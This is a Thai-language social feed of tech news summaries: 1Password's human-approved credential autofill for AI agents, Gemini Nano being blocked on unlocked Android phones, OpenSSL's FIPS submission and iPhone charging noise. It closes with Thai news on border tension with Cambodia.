    🔐 “1Password เปิดตัว Secure Agentic Autofill — ป้องกันรหัสผ่านจาก AI ด้วยระบบอนุมัติแบบมนุษย์” ในยุคที่ AI agents เริ่มทำงานแทนมนุษย์ในเบราว์เซอร์ ตั้งแต่จองตั๋ว ไปจนถึงจัดการบัญชีผู้ใช้ ความสะดวกนี้กลับมาพร้อมความเสี่ยงด้านความปลอดภัย โดยเฉพาะเมื่อ AI สามารถเข้าถึงรหัสผ่านที่จัดเก็บไว้ใน password manager ได้โดยตรง เพื่อรับมือกับความเสี่ยงนี้ 1Password ได้เปิดตัวฟีเจอร์ใหม่ชื่อว่า “Secure Agentic Autofill” ซึ่งเป็นระบบที่ออกแบบมาเพื่อป้องกันไม่ให้ AI agents เข้าถึงข้อมูล credential โดยไม่ได้รับอนุญาตจากมนุษย์ก่อน หลักการทำงานคือ เมื่อ AI agent ต้องการกรอกข้อมูลเข้าสู่ระบบใด ๆ มันจะส่งคำขอไปยัง 1Password ซึ่งจะตรวจสอบ credential ที่เกี่ยวข้อง และแสดงหน้าต่างขออนุมัติจากผู้ใช้ผ่าน Touch ID, PIN หรือวิธีการยืนยันตัวตนอื่น ๆ เมื่อผู้ใช้อนุมัติแล้ว ระบบจะส่งข้อมูลเข้าสู่เบราว์เซอร์ผ่านช่องทางเข้ารหัสแบบ end-to-end โดยที่ AI agent ไม่สามารถเห็นหรือจัดเก็บรหัสผ่านได้เลย ฟีเจอร์นี้เปิดให้ใช้งานแบบ early access ผ่าน Browserbase ซึ่งเป็นแพลตฟอร์มสำหรับการสร้างและควบคุม AI agents ในเบราว์เซอร์ โดยนักพัฒนาสามารถเชื่อมต่อ vault ของ 1Password และกำหนดว่า agent ใดสามารถเข้าถึง credential ใดได้บ้าง แม้ระบบนี้จะเพิ่มความปลอดภัยอย่างมาก แต่ก็มีข้อแลกเปลี่ยนคือ ผู้ใช้ต้องอยู่เพื่ออนุมัติการกรอกข้อมูลทุกครั้ง ซึ่งอาจขัดกับแนวคิดของการทำงานอัตโนมัติเต็มรูปแบบ ✅ ข้อมูลสำคัญจากข่าว ➡️ 1Password เปิดตัวฟีเจอร์ Secure Agentic Autofill เพื่อป้องกัน AI agents เข้าถึงรหัสผ่าน ➡️ ระบบใช้การอนุมัติจากมนุษย์ก่อนส่ง credential เข้าสู่เบราว์เซอร์ ➡️ การอนุมัติทำผ่าน Touch ID, PIN หรือวิธีการยืนยันตัวตนอื่น ๆ ➡️ ข้อมูลถูกส่งผ่านช่องทางเข้ารหัสแบบ end-to-end โดยที่ AI agent ไม่เห็นรหัสผ่าน ➡️ ฟีเจอร์เปิดให้ใช้งานผ่าน Browserbase สำหรับนักพัฒนา AI agent ➡️ ผู้ใช้สามารถกำหนดว่า agent ใดเข้าถึง credential ใดได้บ้าง ➡️ ระบบมี audit log เพื่อบันทึกว่า credential ถูกใช้เมื่อใดและอย่างไร ✅ ข้อมูลเสริมจากภายนอก ➡️ Browserbase เป็นแพลตฟอร์มสำหรับสร้าง AI agent ที่ทำงานในเบราว์เซอร์ ➡️ AI agents เริ่มถูกใช้ในงานจริง เช่น การจัดซื้อ การ onboarding และการบริการลูกค้า ➡️ ระบบ “human-in-the-loop” เป็นแนวทางที่นิยมในงาน AI ที่ต้องการความปลอดภัยสูง ➡️ การใช้ credential แบบ just-in-time ช่วยลดความเสี่ยงจากการเก็บข้อมูลไว้ในระบบ ➡️ การแยกตัวตนของ AI agent กับผู้ใช้จริงเป็นหัวใจของการรักษาความปลอดภัยในระบบอัตโนมัติ https://securityonline.info/1password-launches-secure-agentic-autofill-with-human-in-the-loop-to-protect-credentials-from-ai-agents/
    SECURITYONLINE.INFO
    1Password Launches Secure Agentic Autofill with Human-in-the-Loop to Protect Credentials from AI Agents
    1Password launched Secure Agentic Autofill to prevent AI agents from accessing credentials. It uses Touch ID for approval, creating a secure, human-in-the-loop workflow for web automation.
    0 ความคิดเห็น 0 การแบ่งปัน 2 มุมมอง 0 รีวิว
  • “Google ปิดประตู Gemini Nano บนมือถือที่ปลดล็อก bootloader — นักพัฒนาและผู้ใช้สาย root อาจต้องเลือกระหว่างอิสระกับ AI”

    Google ได้ประกาศอย่างเป็นทางการผ่านเอกสาร ML Kit API ว่าอุปกรณ์ Android ที่มีการปลดล็อก bootloader จะไม่สามารถใช้งาน Gemini Nano ได้ ซึ่งเป็นโมเดล AI ขนาดเล็กที่ออกแบบมาให้ทำงานบนอุปกรณ์โดยตรง โดยไม่ต้องเชื่อมต่อกับคลาวด์

    Gemini Nano เป็นโมเดลที่ใช้พลังประมวลผลจาก GPU/NPU ภายในเครื่อง เพื่อให้สามารถตอบสนองได้รวดเร็วและรักษาความเป็นส่วนตัวของผู้ใช้ โดยไม่ต้องส่งข้อมูลขึ้นเซิร์ฟเวอร์ของ Google ซึ่งถือเป็นจุดเด่นที่ทำให้ผู้ใช้หลายคนชื่นชอบ

    แต่เมื่อ bootloader ถูกปลดล็อก ระบบจะถือว่าอุปกรณ์นั้น “ไม่ปลอดภัย” และจะปิดการเข้าถึง API ของ Gemini Nano โดยแสดงข้อความ “FEATURE_NOT_FOUND” ซึ่งหมายถึงฟีเจอร์ไม่สามารถใช้งานได้ในสถานะปัจจุบันของเครื่อง

    แม้ผู้ใช้จะเชื่อมต่ออินเทอร์เน็ตหรือรีสตาร์ทเครื่อง ก็ไม่สามารถแก้ไขปัญหานี้ได้ หาก bootloader ยังถูกปลดล็อกอยู่ ซึ่งส่งผลกระทบต่อผู้ใช้ที่ต้องการ root เครื่องหรือใช้ custom ROM เพื่อปรับแต่งระบบ

    แนวโน้มนี้สะท้อนถึงการเปลี่ยนแปลงของระบบ Android ที่เคยเปิดกว้างสำหรับนักพัฒนาและผู้ใช้ขั้นสูง แต่กำลังถูกจำกัดมากขึ้น โดยผู้ผลิตหลายรายเริ่มปิดกั้นการปลดล็อก bootloader หรือจำกัดให้ทำได้เพียงเครื่องเดียวต่อบัญชี

    แม้จะเป็นการตัดสินใจที่มีเหตุผลด้านความปลอดภัย แต่ก็สร้างความไม่พอใจให้กับผู้ใช้บางกลุ่มที่เคยใช้ฟีเจอร์ AI บนเครื่องอย่างเต็มประสิทธิภาพ

    ข้อมูลสำคัญจากข่าว
    Google ประกาศว่าอุปกรณ์ที่ปลดล็อก bootloader จะไม่สามารถใช้ Gemini Nano ได้
    Gemini Nano เป็นโมเดล AI ขนาดเล็กที่ทำงานบนอุปกรณ์โดยตรง
    การปลดล็อก bootloader ทำให้ระบบถือว่าอุปกรณ์ไม่ปลอดภัย
    API ของ Gemini Nano จะแสดงข้อความ “FEATURE_NOT_FOUND” บนเครื่องที่ปลดล็อก
    การเชื่อมต่ออินเทอร์เน็ตหรือรีสตาร์ทเครื่องไม่สามารถแก้ไขปัญหาได้
    ผู้ใช้ที่ root เครื่องหรือใช้ custom ROM จะไม่สามารถใช้ฟีเจอร์ AI บนเครื่องได้
    ผู้ผลิตหลายรายเริ่มจำกัดการปลดล็อก bootloader หรือยกเลิกฟีเจอร์นี้ไปเลย

    ข้อมูลเสริมจากภายนอก
    Gemini Nano ใช้ในฟีเจอร์อย่าง smart reply, audio summarization และ image description
    ML Kit API เป็นเครื่องมือสำหรับนักพัฒนาในการเรียกใช้ฟีเจอร์ AI บนอุปกรณ์ Android
    การปลดล็อก bootloader เป็นวิธีที่ใช้ในการติดตั้ง ROM แบบกำหนดเองหรือ root เครื่อง
    Android 16 เริ่มไม่เผยแพร่ device tree และ driver binaries ทำให้การพัฒนา custom ROM ยากขึ้น
    การจำกัด bootloader เป็นแนวทางที่ผู้ผลิตใช้เพื่อป้องกันการโจมตีและการ debug ที่ไม่พึงประสงค์

    https://securityonline.info/gemini-nano-block-google-locks-on-device-ai-access-for-smartphones-with-unlocked-bootloaders/
    📱 “Google ปิดประตู Gemini Nano บนมือถือที่ปลดล็อก bootloader — นักพัฒนาและผู้ใช้สาย root อาจต้องเลือกระหว่างอิสระกับ AI” Google ได้ประกาศอย่างเป็นทางการผ่านเอกสาร ML Kit API ว่าอุปกรณ์ Android ที่มีการปลดล็อก bootloader จะไม่สามารถใช้งาน Gemini Nano ได้ ซึ่งเป็นโมเดล AI ขนาดเล็กที่ออกแบบมาให้ทำงานบนอุปกรณ์โดยตรง โดยไม่ต้องเชื่อมต่อกับคลาวด์ Gemini Nano เป็นโมเดลที่ใช้พลังประมวลผลจาก GPU/NPU ภายในเครื่อง เพื่อให้สามารถตอบสนองได้รวดเร็วและรักษาความเป็นส่วนตัวของผู้ใช้ โดยไม่ต้องส่งข้อมูลขึ้นเซิร์ฟเวอร์ของ Google ซึ่งถือเป็นจุดเด่นที่ทำให้ผู้ใช้หลายคนชื่นชอบ แต่เมื่อ bootloader ถูกปลดล็อก ระบบจะถือว่าอุปกรณ์นั้น “ไม่ปลอดภัย” และจะปิดการเข้าถึง API ของ Gemini Nano โดยแสดงข้อความ “FEATURE_NOT_FOUND” ซึ่งหมายถึงฟีเจอร์ไม่สามารถใช้งานได้ในสถานะปัจจุบันของเครื่อง แม้ผู้ใช้จะเชื่อมต่ออินเทอร์เน็ตหรือรีสตาร์ทเครื่อง ก็ไม่สามารถแก้ไขปัญหานี้ได้ หาก bootloader ยังถูกปลดล็อกอยู่ ซึ่งส่งผลกระทบต่อผู้ใช้ที่ต้องการ root เครื่องหรือใช้ custom ROM เพื่อปรับแต่งระบบ แนวโน้มนี้สะท้อนถึงการเปลี่ยนแปลงของระบบ Android ที่เคยเปิดกว้างสำหรับนักพัฒนาและผู้ใช้ขั้นสูง แต่กำลังถูกจำกัดมากขึ้น โดยผู้ผลิตหลายรายเริ่มปิดกั้นการปลดล็อก bootloader หรือจำกัดให้ทำได้เพียงเครื่องเดียวต่อบัญชี แม้จะเป็นการตัดสินใจที่มีเหตุผลด้านความปลอดภัย แต่ก็สร้างความไม่พอใจให้กับผู้ใช้บางกลุ่มที่เคยใช้ฟีเจอร์ AI บนเครื่องอย่างเต็มประสิทธิภาพ ✅ ข้อมูลสำคัญจากข่าว ➡️ Google ประกาศว่าอุปกรณ์ที่ปลดล็อก bootloader จะไม่สามารถใช้ Gemini Nano ได้ ➡️ Gemini Nano เป็นโมเดล AI ขนาดเล็กที่ทำงานบนอุปกรณ์โดยตรง ➡️ การปลดล็อก bootloader ทำให้ระบบถือว่าอุปกรณ์ไม่ปลอดภัย ➡️ API ของ Gemini Nano จะแสดงข้อความ “FEATURE_NOT_FOUND” บนเครื่องที่ปลดล็อก ➡️ การเชื่อมต่ออินเทอร์เน็ตหรือรีสตาร์ทเครื่องไม่สามารถแก้ไขปัญหาได้ ➡️ ผู้ใช้ที่ root เครื่องหรือใช้ custom ROM จะไม่สามารถใช้ฟีเจอร์ AI บนเครื่องได้ ➡️ ผู้ผลิตหลายรายเริ่มจำกัดการปลดล็อก bootloader หรือยกเลิกฟีเจอร์นี้ไปเลย ✅ ข้อมูลเสริมจากภายนอก ➡️ Gemini Nano ใช้ในฟีเจอร์อย่าง smart reply, audio summarization และ image description ➡️ ML Kit API เป็นเครื่องมือสำหรับนักพัฒนาในการเรียกใช้ฟีเจอร์ AI บนอุปกรณ์ Android ➡️ การปลดล็อก bootloader เป็นวิธีที่ใช้ในการติดตั้ง ROM แบบกำหนดเองหรือ root เครื่อง ➡️ Android 16 เริ่มไม่เผยแพร่ device tree และ driver binaries ทำให้การพัฒนา custom ROM ยากขึ้น ➡️ การจำกัด bootloader เป็นแนวทางที่ผู้ผลิตใช้เพื่อป้องกันการโจมตีและการ debug ที่ไม่พึงประสงค์ https://securityonline.info/gemini-nano-block-google-locks-on-device-ai-access-for-smartphones-with-unlocked-bootloaders/
    SECURITYONLINE.INFO
    Gemini Nano Block: Google Locks On-Device AI Access for Smartphones with Unlocked Bootloaders
    Google has confirmed that the Gemini Nano on-device AI model is blocked from running on Android devices with an unlocked bootloader, citing a feature not found error.
    0 ความคิดเห็น 0 การแบ่งปัน 2 มุมมอง 0 รีวิว
  • “OpenSSL 3.5.4 เตรียมผ่านมาตรฐาน FIPS 140-3 — พร้อมรับมือยุคควอนตัมด้วยโมดูลเข้ารหัสแบบเปิด”

    Lightship Security ร่วมกับ OpenSSL Corporation ได้ประกาศการส่ง OpenSSL เวอร์ชัน 3.5.4 เข้าสู่กระบวนการรับรองมาตรฐาน FIPS 140-3 โดย Cryptographic Module Validation Program (CMVP) ซึ่งเป็นขั้นตอนสุดท้ายก่อนการออกใบรับรองอย่างเป็นทางการจาก NIST

    การส่งครั้งนี้ยืนยันว่าโค้ดของโมดูลเข้ารหัสได้ผ่านการทดสอบจากห้องแล็บอิสระและผ่านเกณฑ์ของ NIST แล้วทั้งหมด โดย OpenSSL 3.5.4 ถือเป็นโมดูลแบบ open-source ที่สอดคล้องกับมาตรฐาน FIPS 140-3 ซึ่งจะช่วยให้องค์กรภาครัฐและเอกชนสามารถนำไปใช้งานได้อย่างมั่นใจในด้านความปลอดภัยและการปฏิบัติตามข้อกำหนด

    OpenSSL 3.5 ซึ่งเปิดตัวเมื่อเดือนเมษายน 2025 ได้เพิ่มการรองรับอัลกอริธึมเข้ารหัสแบบ post-quantum เช่น ML-KEM, ML-DSA และ SLH-DSA ตามแนวทางการมาตรฐานของ NIST เพื่อเตรียมความพร้อมสำหรับยุคที่คอมพิวเตอร์ควอนตัมอาจทำลายระบบเข้ารหัสแบบเดิม

    Jason Lawlor ประธานของ Lightship Security กล่าวว่า “นี่คือก้าวสำคัญในการรักษาความปลอดภัยแบบมาตรฐานในหนึ่งในไลบรารีโอเพ่นซอร์สที่ใช้กันแพร่หลายที่สุดในโลก” ขณะที่ Tim Hudson จาก OpenSSL Corporation ย้ำว่า “โมดูลนี้พร้อมใช้งานแล้ว แม้ใบรับรองจะยังไม่ออกก็ตาม”

    การร่วมมือครั้งนี้ยังสานต่อประวัติศาสตร์ของ OpenSSL ในการพัฒนาโมดูลที่ได้รับการรับรอง FIPS ซึ่งถูกใช้งานในระบบของรัฐบาล กลาโหม และองค์กรเชิงพาณิชย์ทั่วโลก

    ข้อมูลสำคัญจากข่าว
    OpenSSL 3.5.4 ถูกส่งเข้าสู่กระบวนการรับรอง FIPS 140-3 โดย CMVP
    โมดูลผ่านการทดสอบจาก NIST และห้องแล็บอิสระเรียบร้อยแล้ว
    เป็นโมดูลแบบ open-source ที่สอดคล้องกับมาตรฐาน FIPS 140-3
    OpenSSL 3.5 รองรับอัลกอริธึม post-quantum เช่น ML-KEM, ML-DSA, SLH-DSA
    โมดูลนี้ถูกใช้งานในระบบของรัฐบาล กลาโหม และองค์กรเชิงพาณิชย์
    Jason Lawlor และ Tim Hudson ยืนยันว่าโมดูลพร้อมใช้งานแล้ว
    การรับรองจะช่วยให้องค์กรสามารถใช้งานได้อย่างมั่นใจในด้าน compliance

    ข้อมูลเสริมจากภายนอก
    FIPS 140-3 เป็นมาตรฐานความปลอดภัยสำหรับโมดูลเข้ารหัสที่ใช้ในภาครัฐสหรัฐฯ
    Post-quantum cryptography คือการเข้ารหัสที่ทนต่อการโจมตีจากคอมพิวเตอร์ควอนตัม
    ML-KEM และ ML-DSA เป็นอัลกอริธึมที่ได้รับการเสนอโดย NIST สำหรับการใช้งานในอนาคต
    OpenSSL เป็นไลบรารีเข้ารหัสที่ใช้ในระบบอินเทอร์เน็ตและ embedded systems ทั่วโลก
    การรับรอง FIPS ช่วยให้องค์กรสามารถผ่านข้อกำหนดด้านความปลอดภัยของหลายประเทศ

    https://securityonline.info/lightship-security-and-the-openssl-corporation-submit-openssl-3-5-4-for-fips-140-3-validation/
    🔐 “OpenSSL 3.5.4 เตรียมผ่านมาตรฐาน FIPS 140-3 — พร้อมรับมือยุคควอนตัมด้วยโมดูลเข้ารหัสแบบเปิด” Lightship Security ร่วมกับ OpenSSL Corporation ได้ประกาศการส่ง OpenSSL เวอร์ชัน 3.5.4 เข้าสู่กระบวนการรับรองมาตรฐาน FIPS 140-3 โดย Cryptographic Module Validation Program (CMVP) ซึ่งเป็นขั้นตอนสุดท้ายก่อนการออกใบรับรองอย่างเป็นทางการจาก NIST การส่งครั้งนี้ยืนยันว่าโค้ดของโมดูลเข้ารหัสได้ผ่านการทดสอบจากห้องแล็บอิสระและผ่านเกณฑ์ของ NIST แล้วทั้งหมด โดย OpenSSL 3.5.4 ถือเป็นโมดูลแบบ open-source ที่สอดคล้องกับมาตรฐาน FIPS 140-3 ซึ่งจะช่วยให้องค์กรภาครัฐและเอกชนสามารถนำไปใช้งานได้อย่างมั่นใจในด้านความปลอดภัยและการปฏิบัติตามข้อกำหนด OpenSSL 3.5 ซึ่งเปิดตัวเมื่อเดือนเมษายน 2025 ได้เพิ่มการรองรับอัลกอริธึมเข้ารหัสแบบ post-quantum เช่น ML-KEM, ML-DSA และ SLH-DSA ตามแนวทางการมาตรฐานของ NIST เพื่อเตรียมความพร้อมสำหรับยุคที่คอมพิวเตอร์ควอนตัมอาจทำลายระบบเข้ารหัสแบบเดิม Jason Lawlor ประธานของ Lightship Security กล่าวว่า “นี่คือก้าวสำคัญในการรักษาความปลอดภัยแบบมาตรฐานในหนึ่งในไลบรารีโอเพ่นซอร์สที่ใช้กันแพร่หลายที่สุดในโลก” ขณะที่ Tim Hudson จาก OpenSSL Corporation ย้ำว่า “โมดูลนี้พร้อมใช้งานแล้ว แม้ใบรับรองจะยังไม่ออกก็ตาม” การร่วมมือครั้งนี้ยังสานต่อประวัติศาสตร์ของ OpenSSL ในการพัฒนาโมดูลที่ได้รับการรับรอง FIPS ซึ่งถูกใช้งานในระบบของรัฐบาล กลาโหม และองค์กรเชิงพาณิชย์ทั่วโลก ✅ ข้อมูลสำคัญจากข่าว ➡️ OpenSSL 3.5.4 ถูกส่งเข้าสู่กระบวนการรับรอง FIPS 140-3 โดย CMVP ➡️ โมดูลผ่านการทดสอบจาก NIST และห้องแล็บอิสระเรียบร้อยแล้ว ➡️ เป็นโมดูลแบบ open-source ที่สอดคล้องกับมาตรฐาน FIPS 140-3 ➡️ OpenSSL 3.5 รองรับอัลกอริธึม post-quantum เช่น ML-KEM, ML-DSA, SLH-DSA ➡️ โมดูลนี้ถูกใช้งานในระบบของรัฐบาล กลาโหม และองค์กรเชิงพาณิชย์ ➡️ Jason Lawlor และ Tim Hudson ยืนยันว่าโมดูลพร้อมใช้งานแล้ว ➡️ การรับรองจะช่วยให้องค์กรสามารถใช้งานได้อย่างมั่นใจในด้าน compliance ✅ ข้อมูลเสริมจากภายนอก ➡️ FIPS 140-3 เป็นมาตรฐานความปลอดภัยสำหรับโมดูลเข้ารหัสที่ใช้ในภาครัฐสหรัฐฯ ➡️ Post-quantum cryptography คือการเข้ารหัสที่ทนต่อการโจมตีจากคอมพิวเตอร์ควอนตัม ➡️ ML-KEM และ ML-DSA เป็นอัลกอริธึมที่ได้รับการเสนอโดย NIST สำหรับการใช้งานในอนาคต ➡️ OpenSSL เป็นไลบรารีเข้ารหัสที่ใช้ในระบบอินเทอร์เน็ตและ embedded systems ทั่วโลก ➡️ การรับรอง FIPS ช่วยให้องค์กรสามารถผ่านข้อกำหนดด้านความปลอดภัยของหลายประเทศ https://securityonline.info/lightship-security-and-the-openssl-corporation-submit-openssl-3-5-4-for-fips-140-3-validation/
    0 ความคิดเห็น 0 การแบ่งปัน 2 มุมมอง 0 รีวิว
  • “iPhone 17 Pro Max เจอปัญหาเสียงรบกวนขณะชาร์จผ่าน USB-C — เสียงซ่าเบา ๆ แม้ปิดเสียง อาจเป็นบั๊กซอฟต์แวร์หรือฮาร์ดแวร์?”

    หลังจากเปิดตัว iPhone 17 Pro Max ได้ไม่นาน ผู้ใช้จำนวนหนึ่งเริ่มรายงานปัญหาเสียงรบกวนจากลำโพงขณะชาร์จผ่านสาย USB-C โดยเสียงที่ได้ยินคล้ายคลื่นวิทยุหรือเสียงซ่าจากวิทยุเก่า ซึ่งเกิดขึ้นแม้จะตั้งค่าเสียงไว้ที่ระดับศูนย์ และไม่มีการเล่นเสียงใด ๆ

    เสียงรบกวนนี้มักเกิดจากลำโพงด้านล่างซ้ายของเครื่อง โดยจะได้ยินชัดเจนเมื่อเอาหูแนบใกล้ลำโพงขณะชาร์จผ่านสาย และจะหายไปทันทีเมื่อถอดสายชาร์จหรือใช้การชาร์จแบบไร้สายผ่าน MagSafe ซึ่งมีแนวโน้มจะเกิดเสียงน้อยกว่า

    ผู้ใช้บางรายพบว่าเสียงจะดังขึ้นเมื่อแบตเตอรี่ใกล้เต็ม หรือเมื่อมีการเลื่อนหน้าจอขณะชาร์จ ซึ่งอาจเกี่ยวข้องกับการทำงานของระบบ UI และการจัดการพลังงานในระดับฮาร์ดแวร์

    แม้จะมีการเปลี่ยนเครื่องใหม่ แต่หลายคนยังพบปัญหาเดิม ทำให้เกิดข้อสงสัยว่าอาจเป็นปัญหาในระดับการออกแบบหรือซอฟต์แวร์ของ iOS 26 โดย Genius Bar ของ Apple ยังไม่พบความผิดปกติในฮาร์ดแวร์ และแนะนำให้ส่งเสียงที่บันทึกไว้พร้อมภาพประกอบเพื่อให้ทีมวิศวกรตรวจสอบ

    Apple ยังไม่ออกแถลงการณ์อย่างเป็นทางการเกี่ยวกับปัญหานี้ และยังไม่มีการปล่อยอัปเดตซอฟต์แวร์เพื่อแก้ไข แม้บางคนจะลองใช้ iOS 26.1 beta แล้วพบว่าเสียงยังคงอยู่

    ข้อมูลสำคัญจากข่าว
    ผู้ใช้ iPhone 17 Pro Max รายงานเสียงซ่าจากลำโพงขณะชาร์จผ่านสาย USB-C
    เสียงเกิดแม้ตั้งค่าเสียงเป็น 0 และไม่มีการเล่นเสียง
    ลำโพงด้านล่างซ้ายเป็นจุดที่เสียงรบกวนเกิดบ่อยที่สุด
    เสียงจะหายไปเมื่อถอดสายหรือใช้ MagSafe แทน
    ปัญหาเกิดมากขึ้นเมื่อแบตเตอรี่ใกล้เต็มหรือมีการเลื่อนหน้าจอ
    การเปลี่ยนเครื่องใหม่ไม่ช่วยแก้ปัญหา
    Genius Bar ไม่พบความผิดปกติในฮาร์ดแวร์
    Apple ยังไม่ออกแถลงการณ์หรือปล่อยอัปเดตแก้ไข

    https://securityonline.info/iphone-17-pro-max-users-report-distorted-audio-and-static-noise-during-usb-c-charging/
    📱 “iPhone 17 Pro Max เจอปัญหาเสียงรบกวนขณะชาร์จผ่าน USB-C — เสียงซ่าเบา ๆ แม้ปิดเสียง อาจเป็นบั๊กซอฟต์แวร์หรือฮาร์ดแวร์?” หลังจากเปิดตัว iPhone 17 Pro Max ได้ไม่นาน ผู้ใช้จำนวนหนึ่งเริ่มรายงานปัญหาเสียงรบกวนจากลำโพงขณะชาร์จผ่านสาย USB-C โดยเสียงที่ได้ยินคล้ายคลื่นวิทยุหรือเสียงซ่าจากวิทยุเก่า ซึ่งเกิดขึ้นแม้จะตั้งค่าเสียงไว้ที่ระดับศูนย์ และไม่มีการเล่นเสียงใด ๆ เสียงรบกวนนี้มักเกิดจากลำโพงด้านล่างซ้ายของเครื่อง โดยจะได้ยินชัดเจนเมื่อเอาหูแนบใกล้ลำโพงขณะชาร์จผ่านสาย และจะหายไปทันทีเมื่อถอดสายชาร์จหรือใช้การชาร์จแบบไร้สายผ่าน MagSafe ซึ่งมีแนวโน้มจะเกิดเสียงน้อยกว่า ผู้ใช้บางรายพบว่าเสียงจะดังขึ้นเมื่อแบตเตอรี่ใกล้เต็ม หรือเมื่อมีการเลื่อนหน้าจอขณะชาร์จ ซึ่งอาจเกี่ยวข้องกับการทำงานของระบบ UI และการจัดการพลังงานในระดับฮาร์ดแวร์ แม้จะมีการเปลี่ยนเครื่องใหม่ แต่หลายคนยังพบปัญหาเดิม ทำให้เกิดข้อสงสัยว่าอาจเป็นปัญหาในระดับการออกแบบหรือซอฟต์แวร์ของ iOS 26 โดย Genius Bar ของ Apple ยังไม่พบความผิดปกติในฮาร์ดแวร์ และแนะนำให้ส่งเสียงที่บันทึกไว้พร้อมภาพประกอบเพื่อให้ทีมวิศวกรตรวจสอบ Apple ยังไม่ออกแถลงการณ์อย่างเป็นทางการเกี่ยวกับปัญหานี้ และยังไม่มีการปล่อยอัปเดตซอฟต์แวร์เพื่อแก้ไข แม้บางคนจะลองใช้ iOS 26.1 beta แล้วพบว่าเสียงยังคงอยู่ ✅ ข้อมูลสำคัญจากข่าว ➡️ ผู้ใช้ iPhone 17 Pro Max รายงานเสียงซ่าจากลำโพงขณะชาร์จผ่านสาย USB-C ➡️ เสียงเกิดแม้ตั้งค่าเสียงเป็น 0 และไม่มีการเล่นเสียง ➡️ ลำโพงด้านล่างซ้ายเป็นจุดที่เสียงรบกวนเกิดบ่อยที่สุด ➡️ เสียงจะหายไปเมื่อถอดสายหรือใช้ MagSafe แทน ➡️ ปัญหาเกิดมากขึ้นเมื่อแบตเตอรี่ใกล้เต็มหรือมีการเลื่อนหน้าจอ ➡️ การเปลี่ยนเครื่องใหม่ไม่ช่วยแก้ปัญหา ➡️ Genius Bar ไม่พบความผิดปกติในฮาร์ดแวร์ ➡️ Apple ยังไม่ออกแถลงการณ์หรือปล่อยอัปเดตแก้ไข https://securityonline.info/iphone-17-pro-max-users-report-distorted-audio-and-static-noise-during-usb-c-charging/
    SECURITYONLINE.INFO
    iPhone 17 Pro Max Users Report Distorted Audio and Static Noise During USB-C Charging
    Users are reporting faint static, distortion, and volume issues on the iPhone 17 Pro Max speakers. The static noise is most noticeable when the device is connected to a USB-C charger.
    0 ความคิดเห็น 0 การแบ่งปัน 4 มุมมอง 0 รีวิว
  • ไม่ได้พูดเส้นตาย 10 ตุลา ต้องปกป้องอธิปไตย : [NEWS UPDATE]

    นายอนุทิน ชาญวีรกูล นายกรัฐมนตรีและรมว.มหาดไทย เผยกรณีเอกอัครราชทูตสาธารณรัฐประชาชนจีน ประจำกัมพูชา ประกาศพร้อมสนับสนุนกัมพูชาปกป้องอธิปไตย ทูตจีนที่ประจำอยู่ในประเทศไทย ก็สนับสนุนไทยเช่นกัน นี่เป็นสิ่งที่ดี เพราะทั้งไทยและกัมพูชาต่างมีประเทศอื่นที่มีความปรารถนาดี อยากเห็นสถานการณ์ไม่บานปลายรุนแรงมากกว่านี้ ส่วนกรณีที่ฝ่ายไทยระบุว่า หากวันที่ 10 ตุลาคม นี้ กัมพูชายังไม่ย้ายออกจากพื้นที่บ้านหนองจาน จังหวัดสระแก้ว จะเคลียร์พื้นที่ด้วยตัวเองนั้น เราต้องไม่ทำตามอำเภอใจ มีกฎหมายสากลรองรับอยู่ คำว่าเส้นตายไม่ได้หลุดออกมาจากรัฐบาล ตอนนี้สิ่งที่ให้ความสำคัญสูงสุดคือ ความปลอดภัยของประชาชนไทย และอธิปไตยรวมถึงศักดิ์ศรีของประเทศไทย

    -"คลิกเดียวส่งถึงบ้าน"ยอดพุ่ง

    -เร่งหาแนวทางตรึงค่าไฟ

    -พาไทยหลุดกับดักเศรษฐกิจ

    -ฉีก MOU ต้องรับผลเสีย
    ไม่ได้พูดเส้นตาย 10 ตุลา ต้องปกป้องอธิปไตย : [NEWS UPDATE] นายอนุทิน ชาญวีรกูล นายกรัฐมนตรีและรมว.มหาดไทย เผยกรณีเอกอัครราชทูตสาธารณรัฐประชาชนจีน ประจำกัมพูชา ประกาศพร้อมสนับสนุนกัมพูชาปกป้องอธิปไตย ทูตจีนที่ประจำอยู่ในประเทศไทย ก็สนับสนุนไทยเช่นกัน นี่เป็นสิ่งที่ดี เพราะทั้งไทยและกัมพูชาต่างมีประเทศอื่นที่มีความปรารถนาดี อยากเห็นสถานการณ์ไม่บานปลายรุนแรงมากกว่านี้ ส่วนกรณีที่ฝ่ายไทยระบุว่า หากวันที่ 10 ตุลาคม นี้ กัมพูชายังไม่ย้ายออกจากพื้นที่บ้านหนองจาน จังหวัดสระแก้ว จะเคลียร์พื้นที่ด้วยตัวเองนั้น เราต้องไม่ทำตามอำเภอใจ มีกฎหมายสากลรองรับอยู่ คำว่าเส้นตายไม่ได้หลุดออกมาจากรัฐบาล ตอนนี้สิ่งที่ให้ความสำคัญสูงสุดคือ ความปลอดภัยของประชาชนไทย และอธิปไตยรวมถึงศักดิ์ศรีของประเทศไทย -"คลิกเดียวส่งถึงบ้าน"ยอดพุ่ง -เร่งหาแนวทางตรึงค่าไฟ -พาไทยหลุดกับดักเศรษฐกิจ -ฉีก MOU ต้องรับผลเสีย
    0 ความคิดเห็น 0 การแบ่งปัน 56 มุมมอง 0 0 รีวิว
  • เริ่มตึงเครียด ชายแดนบ้านหนองจาน -​หนอง​หญ้า​แก้ว​ อ.โคกสูง จ.สระแก้ว ฝ่ายเขมรเสริมมวลชน-กำลังทหารกว่าเท่าตัว คาดหลังเที่ยงมาอีกเพียบ ขณะฝั่งไทยยังเฝ้าดูสถานการณ์​ใกล้ชิด เตือนชาวบ้านอย่าเข้าพื้นที่เสี่ยง

    อ่านต่อ..https://news1live.com/detail/9680000096932

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
